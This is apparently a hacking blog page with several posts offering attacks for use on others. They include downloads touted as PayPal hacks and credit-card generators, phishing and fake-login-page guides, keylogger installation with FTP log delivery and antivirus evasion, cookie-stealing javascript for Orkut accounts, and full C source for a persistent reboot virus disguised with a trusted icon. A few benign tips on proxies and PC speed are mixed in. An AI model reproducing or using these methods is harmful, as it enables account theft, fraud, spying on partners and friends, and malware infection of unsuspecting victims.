]
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Saturday, August 22, 2009

1

New Paypal Hack


Download Paypal Hacker 2008

Paypal hacking Tool

Download Paypal Hacking Tool

Paypal Database Hack

Download Paypal Database Hack

Paypal Amount changer

Download Paypal Amount Changer

Paypal hack V2.01

Download Paypal Hacker V2.1

Paypal Hack V1.02

Download paypal Hack V1.02

Credit Card Generator 2008 by Shadow V1.02

Download Credit Card Generator 2008 by Shadow V1.02

Credit Wrizard V1.01

Download Credit Wrizard V1.01

CC Bank 1.3

Download CC Bank 1.3

AKD SQL Injection3

Download AKD SQL Injection3

My SQL Dumper

Download My SQL Dumper

READ MORE - New Paypal Hack

Thursday, July 16, 2009

0

MSN Password Hacker Software | Recover/Hack Windows Live Messenger Account Password

Hey guys, I found this hacking trick to hack Windows live messenger account password and was amazed about how easy hacking Windows live messenger password has become. In my article Real email hacking software , I have written about reality of msn windows live messenger hacking software. In this article, I will inform you about MSN Messenger account password hacking software- "MSN Password Hacker". I have provided link for software download... just read on.

How does MSN Password Hacker works ???


MSN Password Hacker scans your computer for locally stored MSN account passwords and thus you can hack your msn account password. But, remember, for this msn hacking software to work, there must be locally stored msn passwords on victim computer.


Steps to Use MSN Password Hacker:


1. Download MSN password hacker software.

2.
Unzip the downloaded folder using Winzix (free download here) to obtain msn password hacker.

3.
Run WLMPasswords.exe application. No installation is required for this.

4. In the text field next to "Filter", type in the Windows live messenger email address to be hacked and hit Check.

Hack msn windows live messenger msn password hacker

5. After this, MSN password hacker will scan computer for msn password.

6. And then, you will get MSN account password in plain "text format". Thus, windows live messenger account hacked !!!

Now, how do you hack friend's msn windows live messenger account password. Simply, run the msn hacking program on victim computer with his windows live messenger email id in Filter and hit check. Thus, MSN Password hacker will give you msn windows live messenger password and you will be able to hack his windows live messenger account...cheers.

Note: For this msn hacking software- MSN password hacker to work, you should have .NET Framework version 2.0 and windows live messenger installed.

You will require to have Winzix to get MSN Password hacker. Download Winzix here.

I hope you are now able to hack friend's msn windows live messenger account password using this msn hacking software- MSN Password Hacker. If you have any query or comment about MSN Password hacker, please mention in comments section.

Enjoy HaCkInG.....
READ MORE - MSN Password Hacker Software | Recover/Hack Windows Live Messenger Account Password

0

Hide IP Address – Real ways to hide your IP (working)

Here in this post I will try to give you every possible information to hide the IP address.If you seriously want to hide your IP address then this post is for you!

One of the most frequently asked questions by the internet users is How To Hide IP Address ?. Many times it becomes necessary to hide the real IP address for the sake of privacy.For this, I have tried many softwares, proxy servers and many such tools that guaranteed to hide my IP address.But still none of them worked for me. I think most of you have the same experience.Are you fed up with these dummy softwares that fails to hide the real IP address? Then is there any working way to hide the IP address?

YES, you can definitely hide your IP .

Now I’ll come to the heart of the post, which contains the answer to your curious question How to Hide the IP address ? The only solution to hide your IP address is by using a Proxy Server.But Wait! The story doesn’t end here.Even though proxy servers are the only way to hide your IP address, there are several ways of connecting your PC to the proxy server.Before setting up the connection with the proxy servers you must know some information about different types of proxy servers and their uses.

1. Transparent Proxy Server
This type of proxy server identifies itself as a proxy server and also makes the original IP address available through the http headers. These are generally used to speedup the web browsing since thay have a very good ability to cache websites.But they do not conceal the IP of it’s users. It is widely known as transparent proxy because it will expose your real IP address to the web.This type of proxy server does not hide your IP address.

2. Anonymous Proxy Server
This type of proxy server identifies itself as a proxy server, but does not make the original IP address available. This type of proxy server is detectable, but provides reasonable anonymity for most users. This type of proxy server will hide your IP address.

3. Distorting Proxy Server
This type of proxy server identifies itself as a proxy server, but make an incorrect original IP address available through the http headers. This type of proxy server will hide your IP address.

4. High Anonymity Proxy Server ( Elite Proxy)
This type of proxy server does not identify itself as a proxy server and does not make available the original IP address. This type of proxy server will hide your IP address.So this is the best way to mask your IP.

Which Proxy Server is the best to Hide My IP ?

I know, you can answer this question better than me.Obviously High Anonymity Proxy or Elite Proxy is the best to hide your IP.But it’s not easy to get a list of working elite proxies.If you search the Google, you will definitely get tons of proxy list.You’ll get a list of proxies in the following format

IP:Port Number
Eg: 221.90.45.67:8080 (221.90.45.67 is the IP of the proxy server and 8080 is the port number)
But most of them don’t work.Here are some of the problems/risks associated with using free proxies that are available on the internet.

  • Most of them do not work since the proxy servers frequently changes it’s IP/Port number.
  • Even if you find a working proxy server it may be too slow.
  • Your privacy is not guaranteed since all your traffic is routed through the proxy server.
  • The administrators of the proxy servers may steal your valuable information such as passwords,SSN (Social security number),Credit Card details etc.

So with all these being the risks then how to find a Working,fast,Highly Anonymous and secured Proxy servers?

Now I will give a list of softwares that will really hide your IP address.I have tried many such softwares and have found only few of them working perfectly.Here is a list of working IP Hiding softwares that you can try.I have listed them in the order of their popularity

1. Hide The IP

Let’s you choose the country,Type and speed of the proxy.Not so popular but personally I recommend this to the users.

2. Hide My IP

3. Hide IP NG

You can get more informations about these products on their respective homepages.

How to ensure that the IP is hidden ?

Before you hide your IP you can check your real IP by visiting the following site.

WhatIsMyIPAddress.Com

Once you get your real IP, switch on your IP hiding software.Now once again visit the above site and check your IP address.If you see a new IP then this means that your software is doing the right job.Also the above site(Whatismyipaddress.com) is capable of detecting many proxies.If you see the words such as “Suspected proxy server or network sharing device” or similar words then it means that the proxy you are using is not an Elite Proxy.

One Final Word before you leave! Even though Elite proxies are almost undetectable this doesn’t mean that you can escape from online crimes by hiding your IP.There are many proxy detecting services available which detect almost any proxy.So if you involve in any cyber crimes then you will definitely be behind the bars.Using proxy will not help you in this case.

One More thing, It is unsafe to use proxy during e-commerce transactions such as Online banking,Online Credit Card payment etc.So please avoid proxies during these circumstances.

READ MORE - Hide IP Address – Real ways to hide your IP (working)

3

Submitted by Srikanth on Thursday, 24 July 200819 Comments Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed! Access Any PC from Anywhere.

Everyday I get a lot of emails from people asking How to hack a Yahoo password? So if you’re curious to know how to hack a yahoo password then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.

There are number of sites on the web that provide information to hack a Yahoo password. So what’s special about this site? The only special about this site is that we do not bluff and mislead the readers. We actually teach you the real and working ways to hack a Yahoo password rather than telling some nonsense tricks to crack or hack some one’s yahoo password.

THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Yahoo password: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts that you need to know about hacking Yahoo password.

1. There is no ready made software or program that can hack a Yahoo password just by entering the target username. If you come accross a site that claims to sell a program to hack Yahoo password then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Yahoo password just for $100 or $200. All the hacking services are scams.

The following are the only 2 foolproof methods to hack a Yahoo password.

1. EASIEST WAY TO HACK YAHOO PASSWORD

Using keylogger is the easiest way to hack a Yahoo password. Any one with a basic knowledge of computer can use a keylogger without any problems. It doesn’t matter whether or not you’ve physical access to the target computer. The following are some of the frequently asked questions about keyloggers.

1. What is a keylogger?

A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software.

2. Where can I get the keylogger?

There exists hundrends of keyloggers on the internet. But most of them are of poor quality and fail to deliver a good performance. The two best keyloggers for hacking yahoo password are listed below.

SniperSpy (Supports Remote Installation)

Win-Spy (Supports Remote Installation)

For more information on keyloggers, installation procedure and FAQs please refer my previous post: How to Hack an Email Account

3. Which keylogger is the best to hack Yahoo password?

Both the above mentioned ones are best for hacking Yahoo. However I recommend SniperSpy since it is more reliable and has got a better advantage over WinSpy. To get a complete review of SniperSpy please see my new post Which Spy Software to Choose

If you’re really serious to hack a Yahoo password then I strongly recommend using either of the two mentioned keyloggers.

For a complete installation guide and more information on these two softwares visit the following links

1. SniperSpy 2. WinSpy

2. OTHER WAYS TO HACK YAHOO PASSWORD

The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.

Fake login pages are created by many hackers on their sites which appear exactly as Gmail or Yahoo login pages but the entered details(username & password) are redirected to remote server and we get redirected to some other page. Many times we ignore this but finally we loose our valuable data.

However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo. Because Keyloggers are the easiest way to hack Yahoo password.

READ MORE - Submitted by Srikanth on Thursday, 24 July 200819 Comments Is your Spouse Cheating? Catch a Cheating Spouse Red-Handed! Access Any PC from Anywhere.

0

How to Find the IP Address of a Remote Computer

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. In this post I’ll show you how to find the IP address of a remote computer in simple steps.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.

5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be

http://abc.x10hosting.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.php

The sample log will be in the following format

79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM

NOTE: You have to replace abc with your subdomain name.

I hope this helps. Express your opinion and suggestions through comments.

READ MORE - How to Find the IP Address of a Remote Computer

Tuesday, July 14, 2009

0

Creating a Virus to Restart the Computer at Every Startup


Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)
4. The resulting .exe file is a virus and once you execute it will infect the system.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exefile.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.



Posted Image

READ MORE - Creating a Virus to Restart the Computer at Every Startup

0

How to Create a Fake Login Page

In this post I’ll show you how to create a Fake Login Page in simple steps.A Fake Login Page is a page that exactly resembles the original login page of sites like Yahoo,Gmail etc.However, these Fake login pages are created just for the purpose of stealing other’s passwords.

Here in this post I will give a procedure to create a fake login page of Yahoo.com.The same procedure may be followed to create the fake login page of Gmail and other sites.

Due to a large number of requests from my visitors, I have elaborated some of the steps in this post. I have made best effort to explain every point in detail.

Here is a step-by-step procedure to create a fake login page.

STEP 1.
Go to the Yahoo login page by typing the following URL.

mail.yahoo.com

STEP 2.
Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as.mht file)
To save the page goto File->Save As

Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.

STEP 3.
Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email! .

STEP 4.
Make sure that the folder contains the necessary images and other support files.Nowrename the Folder to “files.You may also rename the .HTML file to yahoo.HTML

STEP 5.
Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.

For example you may find something like this in the opened HTML file

src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif

Rename the above link into

src=”files/ma_mail_1.gif

Repeat the same procedure for every file contained in the folder by name “files“.

Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.

STEP 6.

Now search for the following term

action=

you will see something like this

action=https://login.yahoo.com/config/login?

Edit this to

action=http://yoursite.com/login.php

Tip: Open a free account in 110mb.com to create your own site for uploading the Fake Login Page. yoursite.com has to be substituted by the name of your site.For example if your site name is yahooupdate.110mb.com then replace yoursite.com withyahooupdate.110mb.com.

Save the changes to the file.

NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.

STEP 7.

Now you have to upload your yahoo.HTML, files folder and login.php to

yoursite.com Root folder

NOTE: Make sure that your host supports PHP

Tip: 110mb.com supports PHP

STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)

Tip: login.php can save the password in any format (not necessarily .TXT format).You can search a php script in Google that can save the password in any format.You may also search a php script that can email the username & password

NOTE: The concept here is to save the password.The format is not important here.

STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.


Posted Image

READ MORE - How to Create a Fake Login Page

1

Unblock Youtube login : Youtube proxy to unblock youtube

In this article, I will inform you about one Youtube proxy site to unblock youtube login. This unblock Youtube proxy is working with good speed.

Unblock youtube login proxy

Unblock Youtube login with Youtube proxy:


1. Go to
Unblock Youtube proxy site.

2. There, you will see something like this:

How to unblock youtube.com

3. Now, simply enter www.youtube.com in text field adjacent to "Begin" to unblock Youtube login. Hit "Begin" and you will be able to unblock youtube login at school at office.

4. By using Options, you can:

# Remove cookies
# Remove Scripts
#


Thus, you will be able to
unblock youtube loginusing this unblock youtube proxy. I have tested this youtube proxy and found it working cool. If you have any problem in using this Youtube proxy to unblock youtube login, please mention it in comments.

Enjoy n unblock Youtube login...
READ MORE - Unblock Youtube login : Youtube proxy to unblock youtube

0

Orkut hack : Hacking Orkut account password by cookie stealing


I have mentioned about way of Hacking orkut account password by orkut phishing in my previous orkut account hacking articles. I was asked by many readers about
how to hack orkut account password
by cookie stealing method. So, i thought of informing you about method of hacking orkut account password using cookie stealing method in this security article.


Hacking orkut account by cookie stealing
Note : This trick of hacking orkut account password is no more working, due to recent updates by orkut.com. I was asked by many readers about this way of hacking orkut account and hence informing you. Keeping knowledge of this way of hacking orkut account will help you in future.

Hacking orkut account password:


1. Get Firefox and then Cookie editor firefox addon.

2. Here, you should have 2 Orkut accounts (Yep !). One for sending cookie script to victim and other to receive victim's orkut cookies.

3. Javascript to be sent to victim for hacking orkut account password :

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action='scrapbook.aspx?
Action.submit';nobody.submit()


4. Now, replace the value in blue with your orkut album value. Right click on your photo and selecting Properties, you will get a 8-digit number (not available now due to recent fix by orkut.com) like say
55886645.jpg. Just replace "33444211"with "55886645" in above script.

5. The final script which you'll send to victim will look like :

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action='Scrapbook.aspx?Action.writeScrapBasic';nobody.submit()


6. Send this cookie script to one whose, you wanna hack orkut account and ask him to paste it in his address bar and hit enter.

7. You'll get his orkut account cookie in scrapbook. Now, go to your orkut homepage. Click Tools ->Cookie editor plugin. Now, click on Filter/ Refresh and look for "orkut_state". Double click it and replace this with victim script and put your eight digit number in place of "33444211".

8. Simply logout of your orkut account and login again. You'll be on victim homepage and hence, hacking orkut account...your aim of hacking orkut account completed.

So guys, this was the orkut hack used forhacking orkut accountby cookie stealing. This hack for hacking orkut account is reported to be fixed by orkut.com and hence no more working. Efforts are being taken to develop new ways of hacking orkut account. I will inform you about newly developed orkut hacks as they are out.

Posted Image
READ MORE - Orkut hack : Hacking Orkut account password by cookie stealing

Monday, July 13, 2009

0

Download Unlimited from Rapidshare without paying

I knew a lot of us here use Rapidshare to download and share a lot of stuff. It's quite annoying when we were unable to download for a certain period after downloading a big file. What are going to be shared to day is how to download from Rapidshare using proxy so that you won't have to face the 1 hour limitation problem again.

The programs that we need are a browser with ability to use proxy. I use Slimbrowser for two reasons:

1) I don't want to delete my Firefox or IE cache and cookies files.

2) It's very lite and not a resource hogger

Steps:

1. Download the browser from this location. Install it.
2. Get a proxy list here. This trick requires the usage of proxy server to work. So don't skip this step. Grab one proxy or more!
3. This is how you are going to setup your proxy

:Click Tools > Proxies > Organize Proxies

- In the Name field, enter something to identify your proxy, for example, Brazil #1
- In the first address field, enter the proxy address you got from Proxy4Free,
for example, 200.162.195.62
- In the second address field, enter the proxy port, for example, 3128
- If you want to set the entered proxy as the default proxy, then click the
Set As Current Proxy button
- Click OK to close the dialog box

* If you want to add more proxies, repeat the steps above again and again.

4. After you have setup the proxy, copy and paste the Rapidshare download link to your
browsers’ address bar, and wait for the Rapidshare page to launch.

5. In Rapidshare website, do the followings:

- Press enter and scoll down to bottom and click the FREE button

- Wait until the counter reaches zero or use any auto-reveal-link-utility
- Copy paste the download link into your favorite download manager, for
example, Flashget
- Download the file happily

Troubleshooting

Note that if Rapidshare gives you error like this;

This IP is not allowed to use free anonymous services.. or Your IP, xxx.xxx.xxx.xxx is downloading a file…

It's time to use another proxy!!! In Slimbrowser, go to menu, Tools > Proxies and select another proxy you already entered before

6) After downloading a file, don’t forget to clear your trace!


In Slimbrowser go to menu Tools > Internet Options to open the Internet Options applet
Click both Delete Cookies and Delete Files button to wipe out all references to Rapidshare. If you need to download more files, repeat all steps from 1 to 6, and hopefully you’ll be happier than ever.

Tips:

1. Do not choose proxy with port 80

2. Avoid choosing proxies addresses
READ MORE - Download Unlimited from Rapidshare without paying

Friday, July 10, 2009

0

HACK ANYONE WITH ARMADAX KEYLOGGER



~CareFully Follow These 14 Points Then U Can Hack Someone


I HACK MANAY PASSWORD USING THIS WONDERFUL TOOL ITS VERY EASY TO HACK SOME ONE



Ardamax keylogger is now very old keylogger and usually detected by most antiviruses. Though old, it is still one of most used Keyloggers. We can use Binders and Crypters to make Ardamax keylogger FUD (Fully UnDetectable). So, I will inform you about Ardamax Keylogger install and use in this article. I have provided link for software download.... just read on. ~~Step By Step Guide~~
1.First Of All Download Armadax Keylogger From Here



2. After downloading, unzip Ardamax keylogger using Winzip Or Winrar



3. Now, after installing, you will get Ardamax log icon in task bar. Right click on it and select "Enter registration key" and make it full version by entering serial key from Serial key.txt file.

4. Go to http://www.drivehq.com and sign up for free FTP account. You need this to direct your keylogger logs and then access these logs. These are the logs that will give you desired passwords. After logging in your FTP account (make sure you are at Online Storage), create a new folder with name "Logs".

5. Now, right click on Ardamax taskbar icon and select "Remote Installation"



6. Click on "Next" to get Appearance screen. Here, click on "Additional components" and untick "Log Viewer" and hit Next.

8. On Web Update screen, simply click Next.

9. Now, you come to Options, and select apt options as you need. eg: It is better to have keylogger run in Stealth mode - so tick "Start in hidden mode" and so on. Click on Next.

10. On "Control" screen, check the box "Send log every" and put time as 30 minutes. Then, in delivery, uncheck "Email" and check "FTP". Leave Include as it is. And uncheck "Send only if log size exceeds". Proceed with "Next".

11. Now, on FTP, enter as below:
FTP Host: http://ftp.drivehq.com
Remote folder: Logs (the one you've created in Step 4)
Username and password: Enter your FTP Username and pass (from Step 4).

12. In "Control" check every box and hit "Next".

13. In Screenshots screen, you can put your own values and hit "Next" to come to Destination. Choose the Keylogger Engine path where you want to put the keylogger on your computer
. Untick "Open the folder containing the keylogger engine" to avoid yourself from being keylogged. Choose the icon you want to use for keylogger. Now, click "Next" and then "Finish".


14. Now, when you have keylogger engine ready. But, this is detected by antivirus as hacktool and so we have to bypass antivirus detection

So U need A Good Crypter For Undetect ur Server.exe File

Open This Website U Get So Many Crypters Get It From Here

Note:- Your antivirus may detect the downloaded Ardamax keylogger file as virus. Please deactivate your antivirus while installing this Ardamax keylogger. Don't worry, I never play such cheap pranks of hacking my readers.
So guys, I hope this Ardamax keylogger tutorial will help you in installing Ardamax keylogger for hacking passwords. Remember, ardamax keylogger is detected as hacktool (virus) by most antivirus. So, dont forget to crypt and bind your keylogger file. If you have any problem in using Ardamax keylogger to hack email passwords, please mention it in comments.

HelpFul Vedios


http://www.youtube.com/watch?v=bzbYak3CFGM
http://www.youtube.com/watch?v=AZx_gU7FK5c
READ MORE - HACK ANYONE WITH ARMADAX KEYLOGGER

0

DISABLE LOW DISK SPACE WARNINGS IN WINDOWS XP



Annoyed of the little pop-ups which remind you of the ever decreasing disk space. Even though, sometimes this is quite useful, at times, this becomes a nuisance when you are busily doing something important and this little popup grabs your attention.

Most of the times you would be pretty much aware of the low space on one or all of your drives. But, you might be waiting for the right time to get yourself a new HDD.
Here is a simple step to disable these popups being displayed. This trick is pretty simple, but Team NIrvana strictly urges you to take a backup of your registry. So, here we go.
1. Go to StartRun and type ‘regedit’ without quotes.
2. In the registry, navigate to ‘HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer’
3. Now create a ‘new binary value’, like this.





And set its value to ‘00 00 00 01′ and hit F5 once and exit the registry.
Its done. Now, XP does not display the pop-up no matter whether you are running out of disk space or whatever.
READ MORE - DISABLE LOW DISK SPACE WARNINGS IN WINDOWS XP

Tuesday, July 7, 2009

0

WEB SERVER SCANNER

THIIS IS A POWERFUL TOOL U CAN SCAN ANY WEBSITE THE FIND WHICH SERVER THAT WILL RUN


DOWNLOAD FROM HERE


READ MORE - WEB SERVER SCANNER

Thursday, July 2, 2009

0

How To: Change Your Ip In Less Then 1 Minute

How To: Change Your Ip In Less Then 1 Minute

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

With a little practice, you can easily get this process down to 15 seconds.

P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back
READ MORE - How To: Change Your Ip In Less Then 1 Minute

Wednesday, July 1, 2009

0

Make Your PC Faster

1. First, run a scandisk or checkdisk. Let Windows fix any errors.

2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.

3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.

4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!)

5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.

6. Check your exisiting swap file for it's size and location (*will explain location later in the post). If you have alot of ram (i.e. 1 gig and over) set this swap file to something small, like 250 mb. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file so check your applications performance after making a size adjustment for any error messages.)

7. Under XP, you can tell Windows to use Classic Style on your desktop, - this will remove the neat single click and internet-style desktop but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.

8. Run msconfig and under startup and only keep the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non-essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.

9. Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc drivers from the manufacturers. Alot of my friends had chipsets on their motherboard that had advanced disk management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1x, instead of being used at 4x!

10. (OK, so this won't speed up your PC but it could save you alot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...

-FOR ADVANCED USERS-

1. Take a look under the hood (for IDE owners). How are your IDE devices configured? If you have more than 1 hard drive, put the master hard drive on the primary IDE channel and the secondary hard drive on the secondary IDE channel (most motherboards have two IDE channels).

2. Place all CDROM drives, DVD readers etc. on the secondary IDE channel (or SCSI bus, etc). This will reduce I/O contention with your master hard drive which should have your OS and apps installed...

3. Remember when I mentioned the location of the swap file? OK, if you have 2 hard drives and you have one on the primary IDE channel and the other on the secondary IDE channel, move the swap file to a partition ON THE SECOND hard drive (on the secondary IDE channel). This will greatly improve system performance as the PC can write to the swap file while loading and running OS and system commands without I/O contention on the primary IDE channel!

4. Take a look under the hood (for SCSI owners) What kind of SCSI do you have? If it's the newer Ultra 160/320 etc cards then guess what? Any devices placed on the same bus will automatically default to the slowest drive on the chain...this means that if you have say, an Ultra 160 SCSI card, and it has an Ultra 160 drive (capable of transferring 160 mb/sec) on the same chain as a SCSI cdrom drive (capable of only 40 mb/sec) then the whole bus slows down to the 40 mb/sec speed...use different chains for the slower devices and maximize those hard drives!

